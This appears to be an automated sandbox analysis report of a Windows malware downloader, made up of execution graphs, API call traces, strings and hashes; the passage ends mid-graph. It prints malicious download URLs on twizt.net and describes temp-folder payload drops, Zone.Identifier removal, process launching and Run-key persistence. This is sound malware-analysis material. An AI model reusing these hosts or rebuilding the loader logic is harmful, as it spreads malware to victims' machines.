                                                                                                                                                                                                                                                    execution_graph 264 251a05 _except_handler4_common 208 251421 226 2519ac 208->226 210 25142d GetStartupInfoA 211 25145b 210->211 212 25146d 211->212 213 251474 Sleep 211->213 214 251497 212->214 215 25148d _amsg_exit 212->215 213->211 216 2514c0 214->216 217 2514a0 _initterm_e 214->217 215->216 218 2514cf _initterm 216->218 221 2514ea __IsNonwritableInCurrentImage 216->221 217->216 219 2514bb __onexit 217->219 218->221 220 251585 _ismbblead 220->221 221->220 223 25156f exit 221->223 224 2515ca 221->224 227 251360 Sleep 221->227 223->221 224->219 225 2515d3 _cexit 224->225 225->219 226->210 236 251100 7 API calls 227->236 231 25137d 232 251381 InternetOpenA 231->232 233 2513be 231->233 234 2513a2 InternetOpenUrlA InternetCloseHandle 232->234 235 2513b9 InternetCloseHandle 232->235 233->221 234->235 235->233 237 251299 InternetCloseHandle Sleep 236->237 238 25119b InternetOpenUrlW 236->238 239 251355 237->239 240 2512b8 6 API calls 237->240 241 251291 InternetCloseHandle 238->241 242 2511bd CreateFileW 238->242 255 251000 ExpandEnvironmentStringsW wsprintfW 239->255 240->239 243 251323 wsprintfW DeleteFileW 240->243 241->237 244 251284 CloseHandle 242->244 245 2511e2 InternetReadFile 242->245 246 251080 3 API calls 243->246 244->241 247 251201 245->247 248 25123f CloseHandle wsprintfW DeleteFileW 245->248 250 251352 246->250 252 25120f WriteFile InternetReadFile 247->252 253 25123b 247->253 261 251080 memset CreateProcessW 248->261 250->239 251 251279 251->244 254 251280 251->254 252->247 252->253 253->248 254->244 256 251043 255->256 257 251047 256->257 258 251050 CreateFileW 256->258 257->231 259 251076 258->259 260 25106f CloseHandle 258->260 259->231 260->259 262 2510e7 Sleep 261->262 263 2510f8 261->263 262->251 263->251 265 2516e1 268 251a58 265->268 267 2516e6 267->267 269 251a7d 268->269 270 251a8a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 268->270 269->270 271 251a81 269->271 270->271 271->267 272 251600 273 25160e __set_app_type _encode_pointer __p__fmode __p__commode 272->273 275 2516ad _pre_c_init __RTC_Initialize 273->275 276 2516c7 275->276 277 2516bb __setusermatherr 275->277 282 251a2a _controlfp_s 276->282 277->276 280 2516d5 _configthreadlocale 281 2516de 280->281 283 251a46 _invoke_watson 282->283 284 2516cc 282->284 283->284 284->280 284->281 285 2515af 286 2515c3 _exit 285->286 287 2515ca 285->287 286->287 288 2515d3 _cexit 287->288 289 2515d9 __onexit 287->289 288->289 290 251b28 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 291 251c12 _crt_debugger_hook 290->291 292 251c1a GetCurrentProcess TerminateProcess 290->292 291->292 293 2516eb 294 251727 293->294 296 2516fd 293->296 295 251722 ?terminate@ 295->294 296->294 296->295 297 25159b _XcptFilter 298 2513db 303 2517e7 298->303 301 251420 302 251418 _amsg_exit 302->301 306 251742 303->306 305 2513e0 __getmainargs 305->301 305->302 313 2519ac 306->313 308 25174e _decode_pointer 309 251765 _onexit 308->309 310 251771 7 API calls 308->310 312 2517d5 __onexit 309->312 314 2517de _unlock 310->314 312->305 313->308 314->312

                                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00251109
                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 00251110
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32 ref: 0025112F
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00251135
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00251149
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00251175
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251187
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002511AD
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 002511D1
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 002511FB
                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00251220
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 00251235
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00251240
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00251258
                                                                                                                                                                                                                                                    • DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 00251269
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 00251285
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00251292
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0025129A
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8,?,?,%temp%,?,00000104), ref: 002512AB
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 002512B8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 002512C6
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 002512C8
                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 002512DC
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00251302
                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0025131A
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00251335
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 00251342
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • %temp%, xrefs: 00251125
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 00251252
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 002512FC
                                                                                                                                                                                                                                                    • %s:Zone.Identifier, xrefs: 0025132F
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00251182
                                                                                                                                                                                                                                                    • %s\%d%d.exe, xrefs: 0025116F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_250000_34D7.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internet$rand$CloseHandlewsprintf$DeleteOpenReadSleep$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                                                                                                    • API String ID: 1566391613-1161929716
                                                                                                                                                                                                                                                    • Opcode ID: ed2305e61315be2641477d8347ead5a4c4a32f6ab7bf98792d3adae0fc014dea
                                                                                                                                                                                                                                                    • Instruction ID: 82f43a7dcdd82784cb81a7a8c3a05d478cb28d896d45b548b1803e7a77d8d9c1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed2305e61315be2641477d8347ead5a4c4a32f6ab7bf98792d3adae0fc014dea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB51D971555341FBE320DB50EC4AFAB33ADEBD5706F004919FA45921C0EA74A61CCB6A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00251018
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00251030
                                                                                                                                                                                                                                                    • PathFileExistsW.KERNELBASE(00000000), ref: 0025103D
                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(40000000,40000000,00000000,00000000,00000001,00000002,00000000), ref: 00251064
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00251070
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_250000_34D7.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateEnvironmentExistsExpandHandlePathStringswsprintf
                                                                                                                                                                                                                                                    • String ID: %s\33573537.jpg$%temp%$^Gv
                                                                                                                                                                                                                                                    • API String ID: 750032643-1524248097
                                                                                                                                                                                                                                                    • Opcode ID: 94cbb8ac653d6ae7fb9ba189c72fdd26274d98d5e30163bff9ef0ab1621e89b1
                                                                                                                                                                                                                                                    • Instruction ID: ba9a8e5b00cc87371626ebec2eb6365604b487646bf1abf2b9b6a5aaaf0fc1c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94cbb8ac653d6ae7fb9ba189c72fdd26274d98d5e30163bff9ef0ab1621e89b1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0F6B4500300F7E6309B20EC4EFD73368AB51706F808914BB65D10E1E7B5D1ACC659

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 00251365
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: GetTickCount.KERNEL32 ref: 00251109
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: srand.MSVCR90 ref: 00251110
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: ExpandEnvironmentStringsW.KERNEL32 ref: 0025112F
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: rand.MSVCR90 ref: 00251135
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: rand.MSVCR90 ref: 00251149
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: wsprintfW.USER32 ref: 00251175
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251187
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 002511AD
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 002511D1
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: InternetReadFile.WININET(00000000,?,00000103,?), ref: 002511FB
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 00251220
                                                                                                                                                                                                                                                      • Part of subcall function 00251100: InternetReadFile.WININET(00000000,?,00000103,?), ref: 00251235
                                                                                                                                                                                                                                                      • Part of subcall function 00251000: ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00251018
                                                                                                                                                                                                                                                      • Part of subcall function 00251000: wsprintfW.USER32 ref: 00251030
                                                                                                                                                                                                                                                      • Part of subcall function 00251000: PathFileExistsW.KERNELBASE(00000000), ref: 0025103D
                                                                                                                                                                                                                                                    • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00251390
                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 002513B0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002513B7
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 002513BA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 0025138B
                                                                                                                                                                                                                                                    • http://twizt.net/newtpp.exe, xrefs: 0025136B
                                                                                                                                                                                                                                                    • http://twizt.net/peinstall.php, xrefs: 002513AA
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_250000_34D7.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Internet$File$Open$CloseEnvironmentExpandHandleReadStringsrandwsprintf$CountCreateExistsPathSleepTickWritesrand
                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36$http://twizt.net/newtpp.exe$http://twizt.net/peinstall.php
                                                                                                                                                                                                                                                    • API String ID: 2331825455-3619598175
                                                                                                                                                                                                                                                    • Opcode ID: f85124ed442c13e9ba8d4dda3dd981fcdb920c3a0f92e67a83cfaa397b69d4b6
                                                                                                                                                                                                                                                    • Instruction ID: 822e78970b0834b75c721f8d4c782d0dae4ac5656c8c4563805e560bb6c35c19
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f85124ed442c13e9ba8d4dda3dd981fcdb920c3a0f92e67a83cfaa397b69d4b6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21F03976BA2715B2E23127612C0FF4B26189B93F53F214051FF05BA1C1AAB4A42D89AD

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 35 251080-2510e5 memset CreateProcessW 36 2510e7-2510f7 Sleep 35->36 37 2510f8-2510fd 35->37
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1455797105.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455773875.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455814238.0000000000252000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1455832680.0000000000254000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_250000_34D7.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateProcessSleepmemset
                                                                                                                                                                                                                                                    • String ID: D
                                                                                                                                                                                                                                                    • API String ID: 4129363112-2746444292
                                                                                                                                                                                                                                                    • Opcode ID: 2d9b2358e6c31d0836c5881ca85f1375f13969d72f137f11dcd70baaa6cbabc9
                                                                                                                                                                                                                                                    • Instruction ID: d01517bf988eea040b69fdb8684e1dad4a95aa06413569bbb38ac180c9cab8d1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d9b2358e6c31d0836c5881ca85f1375f13969d72f137f11dcd70baaa6cbabc9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D0181B0A44300ABE310DF10CC46B4B77E4AB84B01F50481DF749DA2D0EBB5990C8B5B

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:0.9%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:16.7%
                                                                                                                                                                                                                                                    Total number of Nodes:1437
                                                                                                                                                                                                                                                    Total number of Limit Nodes:8
                                                                                                                                                                                                                                                    execution_graph 5817 40cf00 5823 4021b0 5817->5823 5820 40cf3f 5821 40cf25 WaitForSingleObject 5827 401600 5821->5827 5824 4021cf 5823->5824 5825 4021bb 5823->5825 5824->5820 5824->5821 5825->5824 5848 402020 5825->5848 5828 40160d 5827->5828 5847 401737 5827->5847 5829 401619 EnterCriticalSection 5828->5829 5828->5847 5830 4016b5 LeaveCriticalSection SetEvent 5829->5830 5833 401630 5829->5833 5831 4016d0 5830->5831 5832 4016e8 5830->5832 5834 4016d6 PostQueuedCompletionStatus 5831->5834 5835 40d2d0 11 API calls 5832->5835 5833->5830 5836 401641 InterlockedDecrement 5833->5836 5838 40165a InterlockedExchangeAdd 5833->5838 5844 4016a0 InterlockedDecrement 5833->5844 5834->5832 5834->5834 5837 4016f3 5835->5837 5836->5833 5839 40d410 6 API calls 5837->5839 5838->5833 5840 40166d InterlockedIncrement 5838->5840 5841 4016fc CloseHandle CloseHandle WSACloseEvent 5839->5841 5842 401c50 4 API calls 5840->5842 5869 40ab40 shutdown closesocket 5841->5869 5842->5833 5844->5833 5845 401724 DeleteCriticalSection 5846 40a1b0 __aligned_recalloc_base 3 API calls 5845->5846 5846->5847 5847->5820 5849 409d90 7 API calls 5848->5849 5850 40202b 5849->5850 5851 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5850->5851 5857 4021a5 5850->5857 5852 402076 CreateIoCompletionPort 5851->5852 5853 40219f 5851->5853 5852->5853 5854 40208f 5852->5854 5855 401600 35 API calls 5853->5855 5856 40d130 8 API calls 5854->5856 5855->5857 5858 402094 5856->5858 5857->5824 5858->5853 5859 40209f WSASocketA 5858->5859 5859->5853 5860 4020bd setsockopt htons bind 5859->5860 5860->5853 5861 402126 listen 5860->5861 5861->5853 5862 40213a WSACreateEvent 5861->5862 5862->5853 5863 402147 WSAEventSelect 5862->5863 5863->5853 5867 402159 5863->5867 5864 40217f 5866 40d160 16 API calls 5864->5866 5865 40d160 16 API calls 5865->5867 5868 402194 5866->5868 5867->5864 5867->5865 5868->5824 5869->5845 5344 406045 5346 405fbe 5344->5346 5345 40604a LeaveCriticalSection 5346->5345 5347 40a220 8 API calls 5346->5347 5348 40601c 5347->5348 5348->5345 5349 407b49 5350 407b52 5349->5350 5351 407b61 34 API calls 5350->5351 5352 408996 5350->5352 5882 40a28e 5883 40a1b0 __aligned_recalloc_base 3 API calls 5882->5883 5886 40a24d 5883->5886 5884 40a262 5885 409fa0 _invalid_parameter 7 API calls 5885->5886 5886->5884 5886->5885 5887 40a264 memcpy 5886->5887 5887->5886 4355 407590 Sleep CreateMutexA GetLastError 4356 4075c6 ExitProcess 4355->4356 4357 4075ce 6 API calls 4355->4357 4358 407673 4357->4358 4359 40795a Sleep 4357->4359 4411 40e730 GetLocaleInfoA strcmp 4358->4411 4419 40c7d0 4359->4419 4364 407ae1 4365 407975 9 API calls 4422 405bc0 InitializeCriticalSection CreateFileW 4365->4422 5237 407440 4365->5237 5244 405880 4365->5244 5253 406bc0 Sleep GetModuleFileNameW 4365->5253 4366 407680 ExitProcess 4367 407688 ExpandEnvironmentStringsW wsprintfW CopyFileW 4369 407779 Sleep wsprintfW CopyFileW 4367->4369 4370 4076dc SetFileAttributesW RegOpenKeyExW 4367->4370 4371 4077c1 SetFileAttributesW RegOpenKeyExW 4369->4371 4372 40785e Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4369->4372 4370->4369 4374 407718 wcslen RegSetValueExW 4370->4374 4371->4372 4375 4077fd wcslen RegSetValueExW 4371->4375 4372->4359 4377 4078bd SetFileAttributesW RegOpenKeyExW 4372->4377 4374->4369 4378 40774d RegCloseKey 4374->4378 4375->4372 4379 407832 RegCloseKey 4375->4379 4377->4359 4381 4078f9 wcslen RegSetValueExW 4377->4381 4413 40e980 memset memset CreateProcessW 4378->4413 4383 40e980 6 API calls 4379->4383 4381->4359 4385 40792e RegCloseKey 4381->4385 4387 40784b 4383->4387 4389 40e980 6 API calls 4385->4389 4387->4372 4391 407856 ExitProcess 4387->4391 4388 407a2a CreateEventA 4452 40bf00 4388->4452 4393 407947 4389->4393 4390 407771 ExitProcess 4393->4359 4395 407952 ExitProcess 4393->4395 4402 40d160 16 API calls 4403 407a8a 4402->4403 4404 40d160 16 API calls 4403->4404 4405 407aa6 4404->4405 4406 40d160 16 API calls 4405->4406 4407 407ac2 4406->4407 4495 40d2d0 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4407->4495 4409 407ad2 4504 40d410 4409->4504 4412 407678 4411->4412 4412->4366 4412->4367 4414 40e9f1 ShellExecuteW 4413->4414 4415 40e9e2 Sleep 4413->4415 4417 40ea26 4414->4417 4418 40ea17 Sleep 4414->4418 4416 407766 4415->4416 4416->4369 4416->4390 4417->4416 4418->4416 4512 40c7a0 4419->4512 4423 405cd1 4422->4423 4424 405bf8 CreateFileMappingW 4422->4424 4434 40d640 CoInitializeEx 4423->4434 4424->4423 4425 405c19 MapViewOfFile 4424->4425 4425->4423 4426 405c38 GetFileSize 4425->4426 4430 405c4d 4426->4430 4427 405cc7 UnmapViewOfFile 4427->4423 4428 405c5c 4428->4427 4430->4427 4430->4428 4431 405c8c 4430->4431 4641 40c820 4430->4641 4648 405cf0 4430->4648 4432 40a1b0 __aligned_recalloc_base 3 API calls 4431->4432 4432->4428 4952 40d710 socket 4434->4952 4436 407a25 4447 406fe0 CoInitializeEx SysAllocString 4436->4447 4437 40d660 4437->4436 4440 40d6aa 4437->4440 4446 40d6e8 4437->4446 4962 40d980 4437->4962 4977 40aa80 htons 4440->4977 4445 40e470 24 API calls 4445->4446 4996 40a2d0 4446->4996 4448 407002 4447->4448 4449 407018 CoUninitialize 4447->4449 5141 407030 4448->5141 4449->4388 5150 40bec0 4452->5150 4455 40bec0 3 API calls 4456 40bf1e 4455->4456 4457 40bec0 3 API calls 4456->4457 4458 40bf2e 4457->4458 4459 40bec0 3 API calls 4458->4459 4460 407a42 4459->4460 4461 40d130 4460->4461 4462 409d90 7 API calls 4461->4462 4463 40d13b 4462->4463 4464 407a4c 4463->4464 4465 40d147 InitializeCriticalSection 4463->4465 4466 40b2c0 InitializeCriticalSection 4464->4466 4465->4464 4471 40b2da 4466->4471 4467 40b309 CreateFileW 4469 40b330 CreateFileMappingW 4467->4469 4470 40b3de 4467->4470 4469->4470 4472 40b351 MapViewOfFile 4469->4472 5206 40ab60 EnterCriticalSection 4470->5206 4471->4467 5157 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4471->5157 5158 40aea0 4471->5158 4472->4470 4475 40b36c GetFileSize 4472->4475 4481 40b38b 4475->4481 4476 40b3f7 4477 40d160 16 API calls 4476->4477 4479 407a56 4477->4479 4478 40b3d4 UnmapViewOfFile 4478->4470 4483 40d160 4479->4483 4481->4478 4482 40aea0 31 API calls 4481->4482 5205 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 4481->5205 4482->4481 4484 40d177 EnterCriticalSection 4483->4484 4485 407a6f 4483->4485 5233 40d250 4484->5233 4485->4402 4488 40d23b LeaveCriticalSection 4488->4485 4489 409fe0 9 API calls 4490 40d1b9 4489->4490 4490->4488 4491 40d1cb CreateThread 4490->4491 4491->4488 4492 40d1ee 4491->4492 4493 40d212 GetCurrentProcess GetCurrentProcess DuplicateHandle 4492->4493 4494 40d234 4492->4494 4493->4494 4494->4488 4496 40d306 InterlockedExchangeAdd 4495->4496 4497 40d3e9 GetCurrentThread SetThreadPriority 4495->4497 4496->4497 4502 40d320 4496->4502 4497->4409 4498 40d339 EnterCriticalSection 4498->4502 4499 40d3a7 LeaveCriticalSection 4499->4502 4503 40d3be 4499->4503 4500 40d383 WaitForSingleObject 4500->4502 4501 40d3dc Sleep 4501->4502 4502->4497 4502->4498 4502->4499 4502->4500 4502->4501 4502->4503 4503->4497 4505 40d492 4504->4505 4506 40d41c EnterCriticalSection 4504->4506 4505->4364 4507 40d438 LeaveCriticalSection DeleteCriticalSection 4506->4507 4509 40a1b0 __aligned_recalloc_base 3 API calls 4507->4509 4510 40d486 4509->4510 4511 40a1b0 __aligned_recalloc_base 3 API calls 4510->4511 4511->4505 4515 40c3f0 4512->4515 4516 40c40e 4515->4516 4519 40c423 4515->4519 4521 40c450 4516->4521 4518 40796a 4518->4364 4518->4365 4519->4518 4547 40c5d0 4519->4547 4522 40c479 4521->4522 4523 40c502 4521->4523 4546 40c4fa 4522->4546 4581 409d90 4522->4581 4525 409d90 7 API calls 4523->4525 4523->4546 4527 40c528 4525->4527 4529 402420 7 API calls 4527->4529 4527->4546 4531 40c555 4529->4531 4533 4024e0 10 API calls 4531->4533 4535 40c56f 4533->4535 4534 40c4cf 4536 402420 7 API calls 4534->4536 4538 402420 7 API calls 4535->4538 4537 40c4e0 4536->4537 4539 4024e0 10 API calls 4537->4539 4540 40c580 4538->4540 4539->4546 4541 4024e0 10 API calls 4540->4541 4542 40c59a 4541->4542 4543 402420 7 API calls 4542->4543 4544 40c5ab 4543->4544 4545 4024e0 10 API calls 4544->4545 4545->4546 4546->4518 4548 40c5f9 4547->4548 4549 40c6aa 4547->4549 4550 40c6a2 4548->4550 4551 409d90 7 API calls 4548->4551 4549->4550 4553 409d90 7 API calls 4549->4553 4550->4518 4552 40c60f 4551->4552 4552->4550 4555 402420 7 API calls 4552->4555 4554 40c6ce 4553->4554 4554->4550 4557 402420 7 API calls 4554->4557 4556 40c633 4555->4556 4558 409d90 7 API calls 4556->4558 4559 40c6f2 4557->4559 4560 40c642 4558->4560 4561 409d90 7 API calls 4559->4561 4562 4024e0 10 API calls 4560->4562 4563 40c701 4561->4563 4564 40c66b 4562->4564 4565 4024e0 10 API calls 4563->4565 4566 40a1b0 __aligned_recalloc_base 3 API calls 4564->4566 4567 40c72a 4565->4567 4568 40c677 4566->4568 4569 40a1b0 __aligned_recalloc_base 3 API calls 4567->4569 4570 402420 7 API calls 4568->4570 4571 40c736 4569->4571 4573 40c688 4570->4573 4572 402420 7 API calls 4571->4572 4574 40c747 4572->4574 4575 4024e0 10 API calls 4573->4575 4576 4024e0 10 API calls 4574->4576 4575->4550 4577 40c761 4576->4577 4578 402420 7 API calls 4577->4578 4579 40c772 4578->4579 4580 4024e0 10 API calls 4579->4580 4580->4550 4592 409db0 4581->4592 4584 402420 4613 409fa0 4584->4613 4589 4024e0 4620 402540 4589->4620 4591 4024ff __aligned_recalloc_base 4591->4534 4601 409e50 GetCurrentProcessId 4592->4601 4594 409dbb 4595 409dc7 _invalid_parameter 4594->4595 4602 409e70 4594->4602 4596 409d9e 4595->4596 4598 409de2 HeapAlloc 4595->4598 4596->4546 4596->4584 4598->4596 4599 409e09 _invalid_parameter 4598->4599 4599->4596 4600 409e24 memset 4599->4600 4600->4596 4601->4594 4610 409e50 GetCurrentProcessId 4602->4610 4604 409e79 4605 409e96 HeapCreate 4604->4605 4611 409ee0 GetProcessHeaps 4604->4611 4606 409eb0 HeapSetInformation GetCurrentProcessId 4605->4606 4607 409ed7 4605->4607 4606->4607 4607->4595 4610->4604 4612 409e8c 4611->4612 4612->4605 4612->4607 4614 409db0 _invalid_parameter 7 API calls 4613->4614 4615 40242b 4614->4615 4616 402820 4615->4616 4617 40282a 4616->4617 4618 409fa0 _invalid_parameter 7 API calls 4617->4618 4619 402438 4618->4619 4619->4589 4621 40258e 4620->4621 4623 402551 4620->4623 4622 409fa0 _invalid_parameter 7 API calls 4621->4622 4621->4623 4626 4025b2 _invalid_parameter 4622->4626 4623->4591 4624 4025e2 memcpy 4625 402606 _invalid_parameter 4624->4625 4628 